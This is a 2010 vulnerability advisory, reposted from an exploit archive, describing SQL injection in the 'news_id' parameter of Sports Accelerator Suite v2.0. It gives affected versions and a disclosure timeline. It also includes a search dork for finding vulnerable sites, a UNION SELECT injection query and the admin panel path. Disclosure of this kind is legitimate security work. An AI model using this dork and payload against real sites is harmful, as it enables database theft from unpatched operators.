Sports Accelerator Suite v2.0 (news_id) SQL Injection Vulner
Posted on 14 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Sports Accelerator Suite v2.0 (news_id) SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================== Sports Accelerator Suite v2.0 (news_id) SQL Injection Vulnerability =================================================================== Vendor: Athlete Web Services, Inc. / AWS Sports Product Web Page: http://www.athletewebservices.com Summary: Content Management System (PHP+MySQL). Description: The CMS is vulnerable to an SQL Injection attack when input is passed to the "news_id" parameter. The script fails to properly sanitize the input before being returned to the user allowing the attacker to compromise the entire DB system and view sensitive information. ============================================================================= GET .../show_news.php?news_id=xx%27 1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line xx. ============================================================================= Affected Version: 1.1 and 2.0 Tested On: Microsoft IIS 6.0 MySQL 4.0.15-log PHP 4.3.3 Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic liquidworm gmail com http://www.zeroscience.mk Vendor Status: [05.06.2010] Vulnerability discovered. [09.08.2010] Vendor contacted. [13.08.2010] No response from vendor. [14.08.2010] Public advisory released. Zero Science Lab Advisory ID: ZSL-2010-4949 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4949.php Vector: ----------------------------------------------------------------------------- Dork: "Designed and powered by AWS Sports" Query: http://vulnpage.tld/show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n] Admin: http://vulpage.tld/admin/index.php ----------------------------------------------------------------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
